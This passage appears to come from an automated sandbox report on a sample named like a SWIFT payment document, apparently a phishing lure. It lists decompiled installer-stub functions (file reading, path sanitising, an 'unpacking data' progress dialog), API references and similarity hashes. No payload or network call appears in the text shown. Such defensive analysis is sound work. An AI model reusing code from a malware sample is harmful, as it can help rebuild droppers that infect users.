                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2320649405-0
                                                                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                  • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                  • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 87%
                                                                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                  				intOrPtr _t65;
                                                                                  				intOrPtr _t66;
                                                                                  				intOrPtr _t72;
                                                                                  				void* _t76;
                                                                                  				void* _t79;
                                                                                  
                                                                                  				_t72 = __edx;
                                                                                  				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                  				_t65 = 2;
                                                                                  				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                  				_t66 = E00402D84(_t65);
                                                                                  				_t79 = _t66 - 1;
                                                                                  				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                  				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                  				if(_t79 < 0) {
                                                                                  					L36:
                                                                                  					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                                                  				} else {
                                                                                  					__ecx = 0x3ff;
                                                                                  					if(__eax > 0x3ff) {
                                                                                  						 *(__ebp - 0x44) = 0x3ff;
                                                                                  					}
                                                                                  					if( *__edi == __bx) {
                                                                                  						L34:
                                                                                  						__ecx =  *(__ebp - 0xc);
                                                                                  						__eax =  *(__ebp - 8);
                                                                                  						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                  						if(_t79 == 0) {
                                                                                  							 *(_t76 - 4) = 1;
                                                                                  						}
                                                                                  						goto L36;
                                                                                  					} else {
                                                                                  						 *(__ebp - 0x38) = __ebx;
                                                                                  						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                                                  						if( *(__ebp - 0x44) > __ebx) {
                                                                                  							do {
                                                                                  								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                  									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                  										__eax = __ebp - 0x50;
                                                                                  										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                  											goto L34;
                                                                                  										} else {
                                                                                  											goto L21;
                                                                                  										}
                                                                                  									} else {
                                                                                  										goto L34;
                                                                                  									}
                                                                                  								} else {
                                                                                  									__eax = __ebp - 0x40;
                                                                                  									_push(__ebx);
                                                                                  									_push(__ebp - 0x40);
                                                                                  									__eax = 2;
                                                                                  									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                  									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                                  									if(__eax == 0) {
                                                                                  										goto L34;
                                                                                  									} else {
                                                                                  										__ecx =  *(__ebp - 0x40);
                                                                                  										if(__ecx == __ebx) {
                                                                                  											goto L34;
                                                                                  										} else {
                                                                                  											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                  											 *(__ebp - 0x4c) = __ecx;
                                                                                  											 *(__ebp - 0x50) = __eax;
                                                                                  											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                  												L28:
                                                                                  												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                  											} else {
                                                                                  												__ebp - 0x50 = __ebp + 0xa;
                                                                                  												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                  													L21:
                                                                                  													__eax =  *(__ebp - 0x50);
                                                                                  												} else {
                                                                                  													__edi =  *(__ebp - 0x4c);
                                                                                  													__edi =  ~( *(__ebp - 0x4c));
                                                                                  													while(1) {
                                                                                  														_t22 = __ebp - 0x40;
                                                                                  														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                  														__eax = 0xfffd;
                                                                                  														 *(__ebp - 0x50) = 0xfffd;
                                                                                  														if( *_t22 == 0) {
                                                                                  															goto L22;
                                                                                  														}
                                                                                  														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                  														__edi = __edi + 1;
                                                                                  														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                                  														__eax = __ebp + 0xa;
                                                                                  														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                  															continue;
                                                                                  														} else {
                                                                                  															goto L21;
                                                                                  														}
                                                                                  														goto L22;
                                                                                  													}
                                                                                  												}
                                                                                  												L22:
                                                                                  												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                  													goto L28;
                                                                                  												} else {
                                                                                  													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                  														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                  															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                  															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                  														} else {
                                                                                  															__ecx =  *(__ebp - 0xc);
                                                                                  															__edx =  *(__ebp - 8);
                                                                                  															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                  															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                  														}
                                                                                  														goto L34;
                                                                                  													} else {
                                                                                  														__ecx =  *(__ebp - 0xc);
                                                                                  														__edx =  *(__ebp - 8);
                                                                                  														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                  														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                  														 *(__ebp - 0x38) = __eax;
                                                                                  														if(__ax == __bx) {
                                                                                  															goto L34;
                                                                                  														} else {
                                                                                  															goto L26;
                                                                                  														}
                                                                                  													}
                                                                                  												}
                                                                                  											}
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								goto L37;
                                                                                  								L26:
                                                                                  								__eax =  *(__ebp - 8);
                                                                                  							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                  						}
                                                                                  						goto L34;
                                                                                  					}
                                                                                  				}
                                                                                  				L37:
                                                                                  				return 0;
                                                                                  			}








                                                                                  0x004026ec
                                                                                  0x004026ee
                                                                                  0x004026f1
                                                                                  0x004026f3
                                                                                  0x004026f6
                                                                                  0x004026fb
                                                                                  0x004026ff
                                                                                  0x00402702
                                                                                  0x00402705
                                                                                  0x00402c2a
                                                                                  0x00402c2d
                                                                                  0x0040270b
                                                                                  0x0040270b
                                                                                  0x00402712
                                                                                  0x00402714
                                                                                  0x00402714
                                                                                  0x0040271a
                                                                                  0x0040287e
                                                                                  0x0040287e
                                                                                  0x00402881
                                                                                  0x00402886
                                                                                  0x004015b6
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x00000000
                                                                                  0x00402720
                                                                                  0x00402721
                                                                                  0x0040272c
                                                                                  0x0040272f
                                                                                  0x0040273b
                                                                                  0x0040273f
                                                                                  0x004027d7
                                                                                  0x004027ef
                                                                                  0x004027ff
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402745
                                                                                  0x00402745
                                                                                  0x00402748
                                                                                  0x00402749
                                                                                  0x0040274c
                                                                                  0x00402751
                                                                                  0x00402758
                                                                                  0x00402760
                                                                                  0x00000000
                                                                                  0x00402766
                                                                                  0x00402766
                                                                                  0x0040276b
                                                                                  0x00000000
                                                                                  0x00402771
                                                                                  0x00402771
                                                                                  0x00402779
                                                                                  0x0040277c
                                                                                  0x0040277f
                                                                                  0x0040283a
                                                                                  0x00402841
                                                                                  0x00402785
                                                                                  0x0040278b
                                                                                  0x00402797
                                                                                  0x00402801
                                                                                  0x00402801
                                                                                  0x00402799
                                                                                  0x00402799
                                                                                  0x0040279c
                                                                                  0x0040279e
                                                                                  0x0040279e
                                                                                  0x0040279e
                                                                                  0x004027a1
                                                                                  0x004027a6
                                                                                  0x004027a9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004027ab
                                                                                  0x004027ae
                                                                                  0x004027bc
                                                                                  0x004027c2
                                                                                  0x004027d0
                                                                                  0x00000000
                                                                                  0x004027d2
                                                                                  0x00000000
                                                                                  0x004027d2
                                                                                  0x00000000
                                                                                  0x004027d0
                                                                                  0x0040279e
                                                                                  0x00402804
                                                                                  0x00402807
                                                                                  0x00000000
                                                                                  0x00402809
                                                                                  0x0040280e
                                                                                  0x0040284f
                                                                                  0x00402871
                                                                                  0x00402878
                                                                                  0x0040285d
                                                                                  0x0040285d
                                                                                  0x00402860
                                                                                  0x00402863
                                                                                  0x00402866
                                                                                  0x00402866
                                                                                  0x00000000
                                                                                  0x00402817
                                                                                  0x00402817
                                                                                  0x0040281a
                                                                                  0x0040281d
                                                                                  0x00402823
                                                                                  0x00402827
                                                                                  0x0040282a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040282a
                                                                                  0x0040280e
                                                                                  0x00402807
                                                                                  0x0040277f
                                                                                  0x0040276b
                                                                                  0x00402760
                                                                                  0x00000000
                                                                                  0x0040282c
                                                                                  0x0040282c
                                                                                  0x0040282f
                                                                                  0x00402838
                                                                                  0x00000000
                                                                                  0x0040272f
                                                                                  0x0040271a
                                                                                  0x00402c33
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                    • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                  • String ID: 9
                                                                                  • API String ID: 163830602-2366072709
                                                                                  • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                  • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                  • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                  • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E004068EF(WCHAR* _a4) {
                                                                                  				short _t5;
                                                                                  				short _t7;
                                                                                  				WCHAR* _t19;
                                                                                  				WCHAR* _t20;
                                                                                  				WCHAR* _t21;
                                                                                  
                                                                                  				_t20 = _a4;
                                                                                  				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                  					_t20 =  &(_t20[4]);
                                                                                  				}
                                                                                  				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                                                  					_t20 =  &(_t20[2]);
                                                                                  				}
                                                                                  				_t5 =  *_t20;
                                                                                  				_t21 = _t20;
                                                                                  				_t19 = _t20;
                                                                                  				if(_t5 != 0) {
                                                                                  					do {
                                                                                  						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                                                  							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                  							_t19 = CharNextW(_t19);
                                                                                  						}
                                                                                  						_t20 = CharNextW(_t20);
                                                                                  						_t5 =  *_t20;
                                                                                  					} while (_t5 != 0);
                                                                                  				}
                                                                                  				 *_t19 =  *_t19 & 0x00000000;
                                                                                  				while(1) {
                                                                                  					_push(_t19);
                                                                                  					_push(_t21);
                                                                                  					_t19 = CharPrevW();
                                                                                  					_t7 =  *_t19;
                                                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                  						break;
                                                                                  					}
                                                                                  					 *_t19 =  *_t19 & 0x00000000;
                                                                                  					if(_t21 < _t19) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				return _t7;
                                                                                  			}








                                                                                  0x004068f1
                                                                                  0x004068fa
                                                                                  0x00406911
                                                                                  0x00406911
                                                                                  0x00406918
                                                                                  0x00406924
                                                                                  0x00406924
                                                                                  0x00406927
                                                                                  0x0040692a
                                                                                  0x0040692f
                                                                                  0x00406931
                                                                                  0x0040693a
                                                                                  0x0040693e
                                                                                  0x0040695b
                                                                                  0x00406963
                                                                                  0x00406963
                                                                                  0x00406968
                                                                                  0x0040696a
                                                                                  0x0040696d
                                                                                  0x00406972
                                                                                  0x00406973
                                                                                  0x00406977
                                                                                  0x00406977
                                                                                  0x00406978
                                                                                  0x0040697f
                                                                                  0x00406981
                                                                                  0x00406988
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406990
                                                                                  0x00406996
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406996
                                                                                  0x0040699b

                                                                                  APIs
                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                  • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                  • CharNextW.USER32(?,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                  • CharPrevW.USER32(?,?,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Char$Next$Prev
                                                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 589700163-826357637
                                                                                  • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                  • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                  • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                  • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040302E(intOrPtr _a4) {
                                                                                  				short _v132;
                                                                                  				long _t6;
                                                                                  				struct HWND__* _t7;
                                                                                  				struct HWND__* _t15;
                                                                                  
                                                                                  				if(_a4 != 0) {
                                                                                  					_t15 =  *0x420efc;
                                                                                  					if(_t15 != 0) {
                                                                                  						_t15 = DestroyWindow(_t15);
                                                                                  					}
                                                                                  					 *0x420efc = 0;
                                                                                  					return _t15;
                                                                                  				}
                                                                                  				if( *0x420efc != 0) {
                                                                                  					return E00406A71(0);
                                                                                  				}
                                                                                  				_t6 = GetTickCount();
                                                                                  				if(_t6 >  *0x42a26c) {
                                                                                  					if( *0x42a268 == 0) {
                                                                                  						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                                                  						 *0x420efc = _t7;
                                                                                  						return ShowWindow(_t7, 5);
                                                                                  					}
                                                                                  					if(( *0x42a314 & 0x00000001) != 0) {
                                                                                  						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                                                  						return E004056CA(0,  &_v132);
                                                                                  					}
                                                                                  				}
                                                                                  				return _t6;
                                                                                  			}







                                                                                  0x0040303d
                                                                                  0x0040303f
                                                                                  0x00403046
                                                                                  0x00403049
                                                                                  0x00403049
                                                                                  0x0040304f
                                                                                  0x00000000
                                                                                  0x0040304f
                                                                                  0x0040305d
                                                                                  0x00000000
                                                                                  0x00403060
                                                                                  0x00403067
                                                                                  0x00403073
                                                                                  0x0040307b
                                                                                  0x004030b9
                                                                                  0x004030c2
                                                                                  0x00000000
                                                                                  0x004030c7
                                                                                  0x00403084
                                                                                  0x00403095
                                                                                  0x00000000
                                                                                  0x004030a3
                                                                                  0x00403084
                                                                                  0x004030cf

                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                                                  • GetTickCount.KERNEL32 ref: 00403067
                                                                                  • wsprintfW.USER32 ref: 00403095
                                                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                    • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                    • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                  • CreateDialogParamW.USER32 ref: 004030B9
                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                    • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                  • String ID: ... %d%%
                                                                                  • API String ID: 722711167-2449383134
                                                                                  • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                  • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                  • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                  • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                                                  				long _v8;
                                                                                  				signed char _v12;
                                                                                  				unsigned int _v16;
                                                                                  				void* _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				long _v56;
                                                                                  				void* _v60;
                                                                                  				long _t15;
                                                                                  				unsigned int _t19;
                                                                                  				signed int _t25;
                                                                                  				struct HWND__* _t28;
                                                                                  
                                                                                  				_t28 = _a4;
                                                                                  				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                  				if(_a8 == 0) {
                                                                                  					L4:
                                                                                  					_v56 = _t15;
                                                                                  					_v60 = 4;
                                                                                  					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                  					return _v24;
                                                                                  				}
                                                                                  				_t19 = GetMessagePos();
                                                                                  				_v16 = _t19 >> 0x10;
                                                                                  				_v20 = _t19;
                                                                                  				ScreenToClient(_t28,  &_v20);
                                                                                  				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                  				if((_v12 & 0x00000066) != 0) {
                                                                                  					_t15 = _v8;
                                                                                  					goto L4;
                                                                                  				}
                                                                                  				return _t25 | 0xffffffff;
                                                                                  			}














                                                                                  0x00404f8d
                                                                                  0x00404f9a
                                                                                  0x00404fa0
                                                                                  0x00404fde
                                                                                  0x00404fde
                                                                                  0x00404fed
                                                                                  0x00404ff4
                                                                                  0x00000000
                                                                                  0x00404ff6
                                                                                  0x00404fa2
                                                                                  0x00404fb1
                                                                                  0x00404fb9
                                                                                  0x00404fbc
                                                                                  0x00404fce
                                                                                  0x00404fd4
                                                                                  0x00404fdb
                                                                                  0x00000000
                                                                                  0x00404fdb
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                  • GetMessagePos.USER32 ref: 00404FA2
                                                                                  • ScreenToClient.USER32 ref: 00404FBC
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Send$ClientScreen
                                                                                  • String ID: f
                                                                                  • API String ID: 41195575-1993550816
                                                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                  • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                  • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                  				short _v132;
                                                                                  				void* _t11;
                                                                                  				WCHAR* _t19;
                                                                                  
                                                                                  				if(_a8 == 0x110) {
                                                                                  					SetTimer(_a4, 1, 0xfa, 0);
                                                                                  					_a8 = 0x113;
                                                                                  				}
                                                                                  				if(_a8 == 0x113) {
                                                                                  					_t11 = E00403012();
                                                                                  					_t19 = L"unpacking data: %d%%";
                                                                                  					if( *0x42a270 == 0) {
                                                                                  						_t19 = L"verifying installer: %d%%";
                                                                                  					}
                                                                                  					wsprintfW( &_v132, _t19, _t11);
                                                                                  					SetWindowTextW(_a4,  &_v132);
                                                                                  					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}






                                                                                  0x00402fa3
                                                                                  0x00402fb1
                                                                                  0x00402fb7
                                                                                  0x00402fb7
                                                                                  0x00402fc5
                                                                                  0x00402fc7
                                                                                  0x00402fd3
                                                                                  0x00402fd8
                                                                                  0x00402fda
                                                                                  0x00402fda
                                                                                  0x00402fe5
                                                                                  0x00402ff5
                                                                                  0x00403007
                                                                                  0x00403007
                                                                                  0x0040300f

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
